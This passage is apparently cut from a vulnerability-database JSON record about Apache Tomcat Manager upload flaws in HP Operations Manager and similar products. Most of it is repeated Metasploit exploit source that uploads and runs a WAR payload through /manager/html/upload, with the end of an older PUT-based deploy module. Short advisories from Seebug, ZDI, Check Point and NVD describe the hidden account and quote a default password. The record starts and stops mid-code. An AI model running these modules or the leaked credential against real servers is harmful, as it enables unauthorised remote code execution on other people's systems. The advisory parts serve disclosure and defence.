rand_text_alphanumeric(4+rand(32-4)) \nwar = Msf::Util::EXE.to_jsp_war(framework, \narch, plat, \npayload.encoded, \n:jsp_name => jsp_name) \n \napp_base = rand_text_alphanumeric(4+rand(32-4)) \napp_name = app_base + \".war\" \nquery_str = \"?path=/\" + app_base \n \n# \n# UPLOAD \n# \npath_tmp = datastore['PATH'] + \"/deploy\" + query_str \nprint_status(\"Uploading #{war.length} bytes as #{app_name}...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'PUT', \n'ctype' => 'application/octet-stream', \n'data' => war, \n}, 20) \nif (! res) \nraise RuntimeError, \"Upload failed on #{path_tmp} [No Response]\" \nend \nif (res.code < 200 or res.code >= 300) \ncase res.code \nwhen 401 \nprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") \nend \nraise RuntimeError, \"Upload failed on #{path_tmp} [#{res.code} #{res.message}]\" \nend \n \n \n# \n# EXECUTE \n# \nprint_status(\"Executing #{app_base}...\") \nres = send_request_cgi({ \n'uri' => '/' + app_base + '/' + jsp_name + '.jsp', \n'method' => 'GET' \n}, 20) \n \nif (! res) \nprint_error(\"Execution failed on #{app_base} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Execution failed on #{app_base} [#{res.code} #{res.message}]\") \nend \n \n \n# \n# DELETE \n# \npath_tmp = datastore['PATH'] + \"/undeploy\" + query_str \nprint_status(\"Undeploying #{app_base} ...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'GET' \n}, 20) \nif (! res) \nprint_error(\"WARNING: Undeployment failed on #{path} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Deletion failed on #{path} [#{res.code} #{res.message}]\") \nend \n \nhandler \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86448/tomcat_mgr_deploy.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:08", "description": "", "cvss3": {}, "published": "2014-02-01T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Manager Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2014-02-01T00:00:00", "id": "PACKETSTORM:125021", "href": "https://packetstormsecurity.com/files/125021/Apache-Tomcat-Manager-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } \n \nCSRF_VAR = 'CSRF_NONCE=' \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a POST request against the /manager/html/upload \ncomponent. \n \nNOTE: The compatible payload sets vary based on the selected target. For \nexample, you must select the Windows target to use native Windows payloads. \n}, \n'Author' => 'rangercha', \n'License' => MSF_LICENSE, \n'References' => \n[ \n# This is based on jduck's tomcat_mgr_deploy. \n# the tomcat_mgr_deploy o longer works for current versions of tomcat due to \n# CSRF protection tokens. Also PUT requests against the /manager/html/deploy \n# aren't allowed anymore. \n \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n['CVE', '2009-3843'], \n['OSVDB', '60317'], \n['CVE', '2009-4189'], \n['OSVDB', '60670'], \n \n# HP Operations Dashboard \n['CVE', '2009-4188'], \n \n# IBM Cognos Express Default user/pass \n['BID', '38084'], \n['CVE', '2010-0557'], \n['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], \n \n# IBM Rational Quality Manager and Test Lab Manager \n['CVE', '2010-4094'], \n['ZDI', '10-214'], \n \n# 'admin' password is blank in default Windows installer \n['CVE', '2009-3548'], \n['OSVDB', '60176'], \n['BID', '36954'], \n \n# tomcat docs \n['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] \n], \n'Platform' => %w{ java linux win }, # others? \n'Targets' => \n[ \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n# \n# Platform specific targets only \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 09 2009')) \n \nregister_options( \n[ \nOptString.new('USERNAME', [false, 'The username to authenticate as']), \nOptString.new('PASSWORD', [false, 'The password for the specified username']), \n# /cognos_express/manager/ for Cognos Express (19300) \nOptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \ndef check \nres = query_manager \ndisconnect \n \nreturn CheckCode::Unknown if res.nil? \n \nif res.code.between?(400, 499) \nvprint_error(\"#{peer} - Server rejected the credentials\") \nreturn CheckCode::Unknown \nend \n \nreturn CheckCode::Safe unless res.code == 200 \n \n# if res.code == 200 \n# there should be access to the Tomcat Manager and to the status page \nres = query_status \nreturn CheckCode::Unknown unless res \n \nplat = detect_platform(res.body) \narch = detect_arch(res.body) \nreturn CheckCode::Unknown unless plat and arch \n \nvprint_status(\"#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture\") \n \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? \"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \n \nreturn CheckCode::Appears \nend \n \ndef exploit \n@app_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) \n \n# \n# Find the session ID and the CSRF token \n# \nprint_status(\"#{peer} - Retrieving session ID and CSRF token...\") \nunless access_manager? \nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Upload Payload \n# \nprint_status(\"#{peer} - Uploading and deploying #{@app_base}...\") \nif upload_payload \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? \"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \nelse \nfail_with(Failure::Unknown, \"Upload failed\") \nend \n \n# \n# Execute Payload \n# \nprint_status(\"#{peer} - Executing #{@app_base}...\") \nunless execute_payload \nfail_with(Failure::Unknown, \"Failed to execute the payload\") \nend \n \n# \n# Get the new CSRF token & session id \n# \nunless access_manager? \nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Delete the deployed payload \n# \nprint_status(\"#{peer} - Undeploying #{@app_base} ...\") \nunless undeploy_app \nprint_warning(\"#{peer} - Failed to undeploy #{@app_base}...\") \nend \nend \n \ndef query_status \npath = normalize_uri(target_uri.path.to_s, 'status') \nres = send_request_raw('uri' => path) \n \nunless res and res.code == 200 \nvprint_error(\"Failed: Error requesting #{path}\") \nreturn nil \nend \n \nreturn res \nend \n \ndef query_manager \npath = normalize_uri(target_uri.path.to_s, '/html') \nres = send_request_raw('uri' => path) \n \nreturn res \nend \n \ndef vars_get \nvars = {} \nunless @csrf_token.nil? \nvars = { \n\"path\" => @app_base, \n\"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token \n} \nend \n \nreturn vars \nend \n \ndef detect_platform(body) \nreturn nil if body.blank? \n \ni=0 \n \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Name/ \n \nif i == 9 or i == 11 \nif ln.include? \"Windows\" \nreturn 'win' \nelsif ln.include? \"Linux\" \nreturn 'linux' \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i+1 if i > 0 \nend \nend \n \ndef detect_arch(body) \nreturn nil if body.blank? \n \ni=0 \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Architecture/ \n \nif i==9 or i==11 \nif ln.include? 'x86' \nreturn ARCH_X86 \nelsif ln.include? 'i386' \nreturn ARCH_X86 \nelsif ln.include? 'i686' \nreturn ARCH_X86 \nelsif ln.include? 'x86_64' \nreturn ARCH_X86 \nelsif ln.include? 'amd64' \nreturn ARCH_X86 \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i + 1 if i > 0 \nend \nend \n \ndef find_csrf(res = nil) \nreturn \"\" if res.blank? \n \nvprint_status(\"#{peer} - Finding CSRF token...\") \n \nbody = res.body \n \nbody.each_line do |ln| \nln.chomp! \ncsrf_nonce = ln.index(CSRF_VAR) \nnext if csrf_nonce.nil? \ntoken = ln[csrf_nonce + CSRF_VAR.length, 32] \nreturn token \nend \n \nreturn \"\" \nend \n \ndef generate_multipart_msg(boundary, data) \n# Rex::MIME::Message is breaking the binary upload when trying to \n# enforce CRLF for SMTP compatibility \nwar_multipart = \"-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\" \nwar_multipart << @app_base \nwar_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\" \nwar_multipart << data \nwar_multipart << \"\\r\\n-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"--\\r\\n\" \nend \n \ndef war_payload \npayload.encoded_war({ \n:app_name => @app_base, \n:jsp_name => @jsp_name, \n:arch => target.arch, \n:platform => target.platform \n}).to_s \nend \n \ndef send_war_payload(url, war) \nboundary_identifier = rand_text_numeric(28) \n \nres = send_request_cgi({ \n'uri' => url, \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id, \n'vars_get' => vars_get, \n'data' => generate_multipart_msg(boundary_identifier, war), \n}) \n \nreturn res \nend \n \ndef send_request_undeploy(url) \nres = send_request_cgi({ \n'uri' => url, \n'vars_get' => vars_get, \n'method' => 'POST', \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id \n}) \n \nreturn res \nend \n \ndef access_manager? \nres = query_manager \nreturn false unless res and res.code == 200 \n@session_id = res.get_cookies \n@csrf_token = find_csrf(res) \nreturn true \nend \n \ndef upload_payload \nwar = war_payload \nupload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\") \nvprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\") \nres = send_war_payload(upload_path, war) \nreturn parse_upload_response(res) \nend \n \ndef parse_upload_response(res) \nunless res \nvprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\") \nreturn false \nend \n \nif res.code < 200 or res.code >= 300 \nvprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401 \nvprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef execute_payload \njsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\") \n \nvprint_status(\"#{peer} - Executing #{jsp_path}...\") \n \nres = send_request_cgi({ \n'uri' => jsp_path, \n'method' => 'GET' \n}) \n \nreturn parse_execute_response(res) \nend \n \ndef parse_execute_response(res) \nunless res \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef undeploy_app \nundeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\") \nres = send_request_undeploy(undeploy_url) \n \nunless res \nvprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125021/tomcat_mgr_upload.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:44:46", "description": "BUGTRAQ ID: 37086\r\nCVE ID: CVE-2009-3843\r\n\r\nHP Operations Manager\u662f\u7528\u4e8e\u534f\u8c03IT\u57fa\u7840\u67b6\u6784\u4e2d\u7f51\u7edc\u3001\u6700\u7ec8\u7528\u6237\u4f53\u9a8c\u4e8b\u4ef6\u7684\u7efc\u5408\u4e8b\u4ef6\u548c\u6027\u80fd\u7ba1\u7406\u63a7\u5236\u53f0\u3002\r\n\r\nHP Operations Manager\u7684Tomcat\u7528\u6237XML\u6587\u4ef6\u4e2d\u5b58\u5728\u9690\u85cf\u7684\u8d26\u53f7\uff0c\u6076\u610f\u7528\u6237\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u8d26\u53f7\u8bbf\u95eeorg.apache.catalina.manager.HTMLManagerServlet\u7c7b\uff0c\u800c\u8fd9\u4e2aservlet\u5141\u8bb8\u8fdc\u7a0b\u7528\u6237\u901a\u8fc7POST\u8bf7\u6c42\u5411/manager/html/upload\u4e0a\u4f20\u6587\u4ef6\u3002\u5982\u679c\u653b\u51fb\u8005\u4e0a\u4f20\u4e86\u6076\u610f\u5185\u5bb9\uff0c\u4e4b\u540e\u5c31\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u4e0a\u8bbf\u95ee\u5e76\u4ee5SYSTEM\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nHP Operations Manager 8.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBMA02478\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBMA02478\uff1aSSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\u94fe\u63a5\uff1ahttp://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.DtgsGC..T.Lt1%5f.2ODk.bW89MQ%5f%5fDNLKFTH0\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\nhttp://support.openview.hp.com/selfsolve/patches", "cvss3": {}, "published": "2009-11-24T00:00:00", "type": "seebug", "title": "HP Operations Manager 8.10 \u540e\u95e8\u8d26\u53f7\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-24T00:00:00", "id": "SSV:14974", "href": "https://www.seebug.org/vuldb/ssvid-14974", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2023-12-03T19:09:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Operations Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists due to a hidden account present within the Tomcat users XML file. Using this account a malicious user can access the org.apache.catalina.manager.HTMLManagerServlet class. This is defined within the catalina-manager.jar file installed with the product. This servlet allows a remote user to upload a file via a POST request to /manager/html/upload. If an attacker uploads malicious content it can then be accessed and executed on the server which leads to arbitrary code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2009-11-20T00:00:00", "type": "zdi", "title": "Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "ZDI-09-085", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-085/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:39:43", "description": "HP Operations Manager is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. It monitors both physical and virtual servers to identify the root cause of event storms, allowing faster time to resolution at lower cost. It was formerly called OpenView Operations and is built upon the foundation of HP Network Node Manager (NNM). An unauthorized file upload vulnerability exists in HP Operations Manager. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to /manager/html/upload using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system.", "cvss3": {}, "published": "2009-12-30T00:00:00", "type": "checkpoint_advisories", "title": "HP Operations Manager Server Unauthorized File Upload (CVE-2009-3548; CVE-2009-3843; CVE-2009-4189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2016-03-21T00:00:00", "id": "CPAI-2009-312", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-04T14:19:20", "description": "HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "cve", "title": "CVE-2009-4189", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3099", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2009-12-04T05:00:00", "cpe": ["cpe:/a:hp:operations_manager:*"], "id": "CVE-2009-4189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_manager:*:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-01T20:59:54", "description": "This Metasploit module can be used to execute a payload on Apache Tomcat servers that have an exposed \"manager\" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.", "cvss3": {}, "published": "2014-02-04T00:00:00", "type": "zdt", "title": "Apache Tomcat Manager Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2014-02-04T00:00:00", "id": "1337DAY-ID-21853", "href": "https://0day.today/exploit/description/21853", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }\r\n\r\n CSRF_VAR = 'CSRF_NONCE='\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',\r\n 'Description' => %q{\r\n This module can be used to execute a payload on Apache Tomcat servers that\r\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\r\n containing a jsp application using a POST request against the /manager/html/upload\r\n component.\r\n\r\n NOTE: The compatible payload sets vary based on the selected target. For\r\n example, you must select the Windows target to use native Windows payloads.\r\n },\r\n 'Author' => 'rangercha',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n # This is based on jduck's tomcat_mgr_deploy.\r\n # the tomcat_mgr_deploy o longer works for current versions of tomcat due to\r\n # CSRF protection tokens. Also PUT requests against the /manager/html/deploy\r\n # aren't allowed anymore.\r\n\r\n # There is no single vulnerability associated with deployment functionality.\r\n # Instead, the focus has been on insecure/blank/hardcoded default passwords.\r\n\r\n # The following references refer to HP Operations Manager\r\n ['CVE', '2009-3843'],\r\n ['OSVDB', '60317'],\r\n ['CVE', '2009-4189'],\r\n ['OSVDB', '60670'],\r\n\r\n # HP Operations Dashboard\r\n ['CVE', '2009-4188'],\r\n\r\n # IBM Cognos Express Default user/pass\r\n ['BID', '38084'],\r\n ['CVE', '2010-0557'],\r\n ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],\r\n\r\n # IBM Rational Quality Manager and Test Lab Manager\r\n ['CVE', '2010-4094'],\r\n ['ZDI', '10-214'],\r\n\r\n # 'admin' password is blank in default Windows installer\r\n ['CVE', '2009-3548'],\r\n ['OSVDB', '60176'],\r\n ['BID', '36954'],\r\n\r\n # tomcat docs\r\n ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']\r\n ],\r\n 'Platform' => %w{ java linux win }, # others?\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n }\r\n ],\r\n #\r\n # Platform specific targets only\r\n #\r\n [ 'Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 09 2009'))\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [false, 'The username to authenticate as']),\r\n OptString.new('PASSWORD', [false, 'The password for the specified username']),\r\n # /cognos_express/manager/ for Cognos Express (19300)\r\n OptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = query_manager\r\n disconnect\r\n\r\n return CheckCode::Unknown if res.nil?\r\n\r\n if res.code.between?(400, 499)\r\n vprint_error(\"#{peer} - Server rejected the credentials\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n return CheckCode::Safe unless res.code == 200\r\n\r\n # if res.code == 200\r\n # there should be access to the Tomcat Manager and to the status page\r\n res = query_status\r\n return CheckCode::Unknown unless res\r\n\r\n plat = detect_platform(res.body)\r\n arch = detect_arch(res.body)\r\n return CheckCode::Unknown unless plat and arch\r\n\r\n vprint_status(\"#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture\")\r\n\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? \"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n\r\n return CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n @app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n #\r\n # Find the session ID and the CSRF token\r\n #\r\n print_status(\"#{peer} - Retrieving session ID and CSRF token...\")\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Upload Payload\r\n #\r\n print_status(\"#{peer} - Uploading and deploying #{@app_base}...\")\r\n if upload_payload\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? \"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n else\r\n fail_with(Failure::Unknown, \"Upload failed\")\r\n end\r\n\r\n #\r\n # Execute Payload\r\n #\r\n print_status(\"#{peer} - Executing #{@app_base}...\")\r\n unless execute_payload\r\n fail_with(Failure::Unknown, \"Failed to execute the payload\")\r\n end\r\n\r\n #\r\n # Get the new CSRF token & session id\r\n #\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Delete the deployed payload\r\n #\r\n print_status(\"#{peer} - Undeploying #{@app_base} ...\")\r\n unless undeploy_app\r\n print_warning(\"#{peer} - Failed to undeploy #{@app_base}...\")\r\n end\r\n end\r\n\r\n def query_status\r\n path = normalize_uri(target_uri.path.to_s, 'status')\r\n res = send_request_raw('uri' => path)\r\n\r\n unless res and res.code == 200\r\n vprint_error(\"Failed: Error requesting #{path}\")\r\n return nil\r\n end\r\n\r\n return res\r\n end\r\n\r\n def query_manager\r\n path = normalize_uri(target_uri.path.to_s, '/html')\r\n res = send_request_raw('uri' => path)\r\n\r\n return res\r\n end\r\n\r\n def vars_get\r\n vars = {}\r\n unless @csrf_token.nil?\r\n vars = {\r\n \"path\" => @app_base,\r\n \"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token\r\n }\r\n end\r\n\r\n return vars\r\n end\r\n\r\n def detect_platform(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Name/\r\n\r\n if i == 9 or i == 11\r\n if ln.include? \"Windows\"\r\n return 'win'\r\n elsif ln.include? \"Linux\"\r\n return 'linux'\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i+1 if i > 0\r\n end\r\n end\r\n\r\n def detect_arch(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Architecture/\r\n\r\n if i==9 or i==11\r\n if ln.include? 'x86'\r\n return ARCH_X86\r\n elsif ln.include? 'i386'\r\n return ARCH_X86\r\n elsif ln.include? 'i686'\r\n return ARCH_X86\r\n elsif ln.include? 'x86_64'\r\n return ARCH_X86\r\n elsif ln.include? 'amd64'\r\n return ARCH_X86\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i + 1 if i > 0\r\n end\r\n end\r\n\r\n def find_csrf(res = nil)\r\n return \"\" if res.blank?\r\n\r\n vprint_status(\"#{peer} - Finding CSRF token...\")\r\n\r\n body = res.body\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n csrf_nonce = ln.index(CSRF_VAR)\r\n next if csrf_nonce.nil?\r\n token = ln[csrf_nonce + CSRF_VAR.length, 32]\r\n return token\r\n end\r\n\r\n return \"\"\r\n end\r\n\r\n def generate_multipart_msg(boundary, data)\r\n # Rex::MIME::Message is breaking the binary upload when trying to\r\n # enforce CRLF for SMTP compatibility\r\n war_multipart = \"-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\"\r\n war_multipart << @app_base\r\n war_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\"\r\n war_multipart << data\r\n war_multipart << \"\\r\\n-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"--\\r\\n\"\r\n end\r\n\r\n def war_payload\r\n payload.encoded_war({\r\n :app_name => @app_base,\r\n :jsp_name => @jsp_name,\r\n :arch => target.arch,\r\n :platform => target.platform\r\n }).to_s\r\n end\r\n\r\n def send_war_payload(url, war)\r\n boundary_identifier = 